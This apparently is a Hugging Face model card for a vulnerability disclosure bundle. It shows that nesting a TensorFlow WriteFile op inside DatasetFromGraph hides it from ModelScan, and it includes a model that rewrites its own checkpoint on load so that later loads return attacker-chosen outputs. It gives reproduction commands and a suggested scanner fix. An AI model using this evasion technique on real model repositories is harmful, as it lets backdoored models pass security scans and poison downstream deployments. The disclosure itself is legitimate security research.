Instructions to use MediumIQ/tfhunt-savedmodel-nested-writefile with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- TF-Keras
How to use MediumIQ/tfhunt-savedmodel-nested-writefile with TF-Keras:
# Note: 'keras<3.x' or 'tf_keras' must be installed (legacy) # See https://github.com/keras-team/tf-keras for more details. from huggingface_hub import from_pretrained_keras model = from_pretrained_keras("MediumIQ/tfhunt-savedmodel-nested-writefile") - Notebooks
- Google Colab
- Kaggle
| # SavedModel scanner bypass via nested `DatasetFromGraph` `WriteFile` | |
| Three SavedModels that demonstrate, in order, that ModelScan does flag | |
| `WriteFile` when it can see it, that nesting it inside `DatasetFromGraph` | |
| makes it invisible to ModelScan while still running at load, and that the | |
| same nesting technique can rewrite the model's own checkpoint and turn | |
| into a persistent backdoor. | |
| **One thing to be clear about up front.** The `top_level_writefile` model | |
| is a control, not a finding. ModelScan flagging it as HIGH is the intended, | |
| healthy behaviour — it proves the scanner does detect `WriteFile` when | |
| it's visible. The actual bypass is `nested_writefile`, and the backdoor | |
| is `self_poisoning_writefile`. Both of those run the same load-time | |
| `WriteFile` and both pass ModelScan with zero issues. | |
| Tested against the latest published versions of TensorFlow and ModelScan | |
| on PyPI (TensorFlow 2.21.0, ModelScan 0.8.8). | |
| ## What's in the box | |
| ``` | |
| build_poc.py rebuild all three SavedModels | |
| verify_poc.py run ModelScan + load each model + the self-poison | |
| first/second-load differential, all in an isolated cwd | |
| requirements.txt pinned tensorflow and modelscan | |
| sample_results.json sanitised output from a passing run | |
| models/ | |
| top_level_writefile/ ordinary WriteFile in the top-level GraphDef | |
| nested_writefile/ same WriteFile hidden inside a nested GraphDef | |
| self_poisoning_writefile/ nested WriteFile that overwrites the model's | |
| own variables/ checkpoint at load | |
| ``` | |
| ## What each case shows | |
| ### `top_level_writefile` — control (not a finding) | |
| This case exists to prove the baseline. The top-level `GraphDef` | |
| contains the `WriteFile` op directly. ModelScan 0.8.8 reports one HIGH | |
| issue with `operator = WriteFile`, and the model writes its marker file | |
| when loaded. **The control passing is the expected outcome** — it's the | |
| "ModelScan does detect `WriteFile` when it's visible" half of the | |
| differential. Without this case there's no way to say what the bypass | |
| is bypassing. | |
| ### `nested_writefile` — bypass | |
| Same `WriteFile`, same payload, same load-time effect. The only | |
| difference is location. The top-level `GraphDef` contains only | |
| `Const`, `DatasetFromGraph`, and `DatasetToGraphV2`. The `WriteFile` | |
| sits inside a serialised `GraphDef` carried as the bytes of a `Const` | |
| string tensor, and `DatasetFromGraph` consumes that string as a second | |
| parser root. | |
| ModelScan walks the top-level nodes and the function library. It | |
| doesn't parse `Const` string tensors as nested `GraphDef`s, so the | |
| hidden `WriteFile` is invisible to it. The scan reports | |
| `total_issues = 0`. At load time TensorFlow traverses the inner graph | |
| through the TF1 `legacy_init_op` and runs the hidden write anyway. | |
| `saved_model_cli show --all` is also blind to the nested op. | |
| ### `self_poisoning_writefile` — persistent backdoor | |
| A serving model with one variable `w` and signature `y = x * w`. The | |
| model ships with `w = 2.0` on disk. The same nested `DatasetFromGraph` | |
| mechanism carries two hidden `WriteFile` nodes targeting relative paths | |
| `variables/variables.data-00000-of-00001` and `variables/variables.index`. | |
| The contents are checkpoint bytes from a sibling template model built | |
| with `w = 1337.0`. | |
| At first load: | |
| 1. TF restores `w = 2.0` from disk into memory. | |
| 2. The `legacy_init_op` runs the hidden writes, which overwrite the | |
| on-disk checkpoint with the `w = 1337.0` bytes. | |
| 3. Inference still uses the in-memory `w = 2.0`, so `y(3.0) = 6.0`. | |
| The model behaves correctly on this first load, which means a deployment | |
| pipeline that smoke-tests a model once and promotes it on success would | |
| see no anomaly. | |
| On every load after that: | |
| 1. TF restores `w = 1337.0` from the now-poisoned checkpoint. | |
| 2. Inference returns `y(3.0) = 4011.0`. | |
| ModelScan reports the model clean for this case too. | |
| ## Requirements | |
| The pinned versions match the latest stable releases on PyPI at the time | |
| of writing. | |
| ``` | |
| python >= 3.10 | |
| tensorflow == 2.21.0 # latest on PyPI | |
| modelscan == 0.8.8 # latest on PyPI | |
| ``` | |
| Install: | |
| ``` | |
| pip install -r requirements.txt | |
| ``` | |
| ## Reproducing the differential | |
| The repo ships with the prebuilt models under `models/`. To verify all | |
| three cases: | |
| ``` | |
| python verify_poc.py | |
| ``` | |
| The verifier picks a fresh temp directory, runs ModelScan and | |
| `saved_model_cli show --all` on each model, then loads each model in a | |
| child Python process. For the marker cases the child cwd is set to the | |
| per-case workdir so the relative marker path resolves there. For the | |
| self-poisoning case, the model is copied into the workdir, the child cwd | |
| is set to the copied model directory, and the model is loaded twice with | |
| its `variables/` hashes captured before, after the first load, and after | |
| the second load. | |
| Expected output: | |
| ```json | |
| { | |
| "top_level_writefile": { | |
| "pass": true, | |
| "intent": "control: ModelScan is expected to detect top-level WriteFile", | |
| "top_level_has_writefile": true, | |
| "modelscan_total_issues": 1, | |
| "modelscan_flagged_writefile": true, | |
| "marker_written": true | |
| }, | |
| "nested_writefile": { | |
| "pass": true, | |
| "intent": "bypass: ModelScan is expected to miss nested WriteFile, load is expected to run it anyway", | |
| "top_level_has_writefile": false, | |
| "nested_has_writefile": true, | |
| "modelscan_total_issues": 0, | |
| "modelscan_issues_empty": true, | |
| "marker_written": true | |
| }, | |
| "self_poisoning_writefile": { | |
| "pass": true, | |
| "intent": "persistent backdoor: first load returns benign output, on-disk checkpoint is rewritten, second load returns attacker-chosen output", | |
| "top_level_has_writefile": false, | |
| "nested_has_writefile": true, | |
| "modelscan_total_issues": 0, | |
| "modelscan_issues_empty": true, | |
| "input": 3.0, | |
| "expected_benign_output": 6.0, | |
| "expected_poison_output": 4011.0, | |
| "first_load_output": 6.0, | |
| "second_load_output": 4011.0, | |
| "first_load_matches_benign": true, | |
| "second_load_matches_poison": true, | |
| "checkpoint_changed_after_first_load": true, | |
| "checkpoint_stable_after_second_load": true | |
| } | |
| } | |
| ``` | |
| If you want to rebuild the models yourself before verifying: | |
| ``` | |
| python build_poc.py --overwrite | |
| python verify_poc.py | |
| ``` | |
| If you want the loader to use a directory you choose instead of a temp | |
| directory: | |
| ``` | |
| python verify_poc.py --workdir ./scratch | |
| ``` | |
| After a run the marker cases leave files at: | |
| ``` | |
| ./scratch/top_level_writefile/tfhunt_markers/top_level_writefile.txt | |
| ./scratch/nested_writefile/tfhunt_markers/nested_writefile.txt | |
| ``` | |
| Both contain `tfhunt_writefile_payload\n`. | |
| The self-poisoning case leaves a copy of the model with the poisoned | |
| checkpoint at: | |
| ``` | |
| ./scratch/self_poisoning_writefile/self_poisoning_writefile/ | |
| ``` | |
| Reload that copy directly with `tf.saved_model.load` and you'll see | |
| `y(3.0) = 4011.0` instead of the original `6.0`. | |
| ## Manual verification | |
| If you don't want to trust `verify_poc.py`, each claim below can be | |
| checked with the stock tooling. Every step assumes your cwd is the | |
| repo root, and ends back there. | |
| ### 1. ModelScan flags the control, misses the bypass | |
| ``` | |
| modelscan scan -p ./models/top_level_writefile | |
| modelscan scan -p ./models/nested_writefile | |
| ``` | |
| The first scan reports one HIGH issue with `operator = WriteFile`, | |
| which is the control behaving correctly. The second scan reports | |
| `total_issues = 0` on a model that performs the same load-time write. | |
| ### 2. `saved_model_cli` is blind to the nested op | |
| ``` | |
| python -m tensorflow.python.tools.saved_model_cli show --dir ./models/nested_writefile --all | |
| ``` | |
| The relevant line in the output is: | |
| ``` | |
| The MetaGraph with tag set ['serve'] contains the following ops: {'Const', 'DatasetToGraphV2', 'DatasetFromGraph'} | |
| ``` | |
| No mention of `WriteFile`. | |
| ### 3. `tf.saved_model.load` runs the hidden write | |
| The marker path baked into the model is relative, so the write lands | |
| wherever the loader's cwd is. Run the load in a clean working directory. | |
| Linux / macOS: | |
| ``` | |
| mkdir manual_load && cd manual_load | |
| python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')" | |
| ls tfhunt_markers | |
| cat tfhunt_markers/nested_writefile.txt | |
| cd .. | |
| ``` | |
| Windows PowerShell: | |
| ``` | |
| New-Item -ItemType Directory manual_load | Out-Null; Set-Location manual_load | |
| python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')" | |
| Get-ChildItem tfhunt_markers | |
| Get-Content tfhunt_markers\nested_writefile.txt | |
| Set-Location .. | |
| ``` | |
| Expected file content: | |
| ``` | |
| tfhunt_writefile_payload | |
| ``` | |
| ### 4. Self-poisoning rewrites the checkpoint on first load | |
| The relative `WriteFile` targets are `variables/...`, so the load must | |
| run with cwd set to a copy of the model directory. The copy step is | |
| important — without it, the bundled model itself would get poisoned. | |
| Linux / macOS: | |
| ``` | |
| cp -r models/self_poisoning_writefile manual_poison | |
| cd manual_poison | |
| sha256sum variables/variables.data-00000-of-00001 | |
| python -c "import tensorflow as tf; tf.saved_model.load('.')" | |
| sha256sum variables/variables.data-00000-of-00001 | |
| ``` | |
| Windows PowerShell: | |
| ``` | |
| Copy-Item -Recurse models/self_poisoning_writefile manual_poison | |
| Set-Location manual_poison | |
| Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256 | |
| python -c "import tensorflow as tf; tf.saved_model.load('.')" | |
| Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256 | |
| ``` | |
| The two hashes will differ. The on-disk checkpoint has been physically | |
| overwritten by the load. | |
| ### 5. Second load returns the attacker's weights | |
| Stay in the `manual_poison/` directory from step 4 and run the load | |
| again, this time invoking the serving signature: | |
| ``` | |
| python -c "import tensorflow as tf; loaded = tf.saved_model.load('.'); out = loaded.signatures['serving_default'](x=tf.constant(3.0)); print(float(next(iter(out.values())).numpy()))" | |
| ``` | |
| Expected output: | |
| ``` | |
| 4011.0 | |
| ``` | |
| The shipped model is `y = x * w` with `w = 2.0`, so a clean `y(3.0)` | |
| would be `6.0`. After the load-time write in step 4 rewrote the | |
| checkpoint to `w = 1337.0`, the second load reads the poisoned weights | |
| and returns `4011.0`. Return to the repo root with `cd ..` when done. | |
| ### Troubleshooting | |
| - `ModuleNotFoundError: No module named 'tensorflow'` — TensorFlow | |
| isn't installed in the active environment. Run | |
| `pip install -r requirements.txt` from the repo root. | |
| - `pip install` resolution fails on `modelscan` — it needs | |
| Python 3.10-3.12. If the extras aren't pulled in, install with | |
| `pip install 'modelscan[tensorflow,h5py]==0.8.8'`. | |
| - Step 3's marker file doesn't appear — the cwd isn't where you think | |
| it is. Add `import os; print(os.getcwd())` before the `tf.saved_model.load` | |
| call to confirm. | |
| - Step 5 still returns `6.0` — the cwd in step 4 wasn't the copied | |
| `manual_poison` directory, so nothing was poisoned. Copy the model | |
| again from the bundle (`models/self_poisoning_writefile`) and rerun | |
| step 4 with the new copy. Or just rebuild everything from scratch | |
| with `python build_poc.py --overwrite`. | |
| - `saved_model_cli: command not found` — it ships with TensorFlow but | |
| isn't always on `PATH`. Use the explicit form | |
| `python -m tensorflow.python.tools.saved_model_cli show ...`. | |
| ## Why this is interesting | |
| ModelScan flags `WriteFile` as HIGH when it sees it in the top-level | |
| graph, so the operator is already on the unsafe list. The bypass isn't | |
| about the operator. It's about where it's allowed to hide. | |
| The same idea generalises to any side-effecting op that TensorFlow will | |
| run from inside an inner dataset graph. `WriteFile` is the cleanest | |
| demonstration because it's already on ModelScan's denylist, which makes | |
| the top-level-vs-nested differential unambiguous. | |
| The self-poisoning case turns that file-write primitive into a | |
| persistent output-manipulation backdoor that's hard to catch with a | |
| single-load smoke test, because the malicious output only appears on the | |
| second and later loads. | |
| The hidden write also runs in `tf.lite.TFLiteConverter.from_saved_model`, | |
| `tf2onnx.convert`, TensorFlow Serving, and the NVIDIA Triton TensorFlow | |
| backend. Those tests live outside this PoC bundle to keep it small and | |
| auditable, but they use models built the same way. | |
| ## Safety | |
| These models do exactly two things you can't see in the top-level graph: | |
| - `top_level_writefile` and `nested_writefile` write | |
| `tfhunt_writefile_payload\n` to a relative path | |
| `tfhunt_markers/<name>.txt`, resolved against the loader's working | |
| directory. | |
| - `self_poisoning_writefile` overwrites two relative paths | |
| `variables/variables.data-00000-of-00001` and `variables/variables.index` | |
| with the byte content of a `w = 1337.0` template checkpoint. Because | |
| the verifier sets cwd to the copied model directory, those writes only | |
| touch the copy, not the bundled artifact. | |
| None of the models reach for absolute paths, environment variables, | |
| network, credentials, or any other resource. | |
| If you want to inspect the nested graphs yourself without loading the | |
| models, `verify_poc.py`'s `inspect_saved_model` function parses the | |
| serialised inner `GraphDef`s and lists their nodes. | |
| ## Suggested fix | |
| The gap in `modelscan.scanners.SavedModelTensorflowOpScan` is that it | |
| walks `GraphDef.node` and the function library on the top-level | |
| `MetaGraphDef` but doesn't recurse into ops whose inputs are serialised | |
| `GraphDef` bytes. The fix is to treat those ops as parser roots. | |
| Sketch of what the scan loop could look like: | |
| ```python | |
| NESTED_GRAPHDEF_OPS = { | |
| "DatasetFromGraph", # ops that accept a serialised GraphDef in a string input | |
| "XlaCallModule", # carries a serialised StableHLO / MLIR module | |
| } | |
| MAX_RECURSION_DEPTH = 4 | |
| MAX_INNER_BYTES = 10 * 1024 * 1024 | |
| def scan_graphdef(graph_def, depth=0): | |
| if depth > MAX_RECURSION_DEPTH: | |
| return | |
| for node in graph_def.node: | |
| if node.op in UNSAFE_OPERATORS: | |
| report_issue(node, depth=depth) | |
| if node.op in NESTED_GRAPHDEF_OPS: | |
| inner_bytes = resolve_const_string_input(node, "graph_def", graph_def) | |
| if inner_bytes is None or len(inner_bytes) > MAX_INNER_BYTES: | |
| continue | |
| inner = GraphDef() | |
| inner.ParseFromString(inner_bytes) | |
| scan_graphdef(inner, depth=depth + 1) | |
| for fn in graph_def.library.function: | |
| for node in fn.node_def: | |
| # Same walk as above, on the function library. | |
| ... | |
| ``` | |
| The bounded recursion depth and byte cap stop a malicious model from | |
| turning a recursive scan into a parser DoS. | |
| The same logic would help any scanner that gates `.pb` files on a | |
| top-level op walk. For TensorFlow itself, documenting that any op | |
| carrying serialised IR (`DatasetFromGraph`, `XlaCallModule`, and so on) | |
| should be treated as a parser root by external scanners would help | |
| downstream tooling write fixes that cover all of them at once. | |
| ## Files generated by a run | |
| `verify_poc.py` writes: | |
| - `verification.json` next to the script. This contains absolute paths | |
| from your machine, so it's `.gitignore`d and is not part of the | |
| shipped artifact. | |
| `build_poc.py` writes: | |
| - `models/top_level_writefile/saved_model.pb` | |
| - `models/nested_writefile/saved_model.pb` | |
| - `models/self_poisoning_writefile/saved_model.pb` | |
| - `models/self_poisoning_writefile/variables/variables.data-00000-of-00001` | |
| - `models/self_poisoning_writefile/variables/variables.index` | |
| The first two models have empty `variables/` directories. That's expected for those graphs. | |
| ## Environment used to validate | |
| ``` | |
| Python 3.12.3 | |
| tensorflow 2.21.0 | |
| modelscan 0.8.8 | |
| Windows host | |
| ``` | |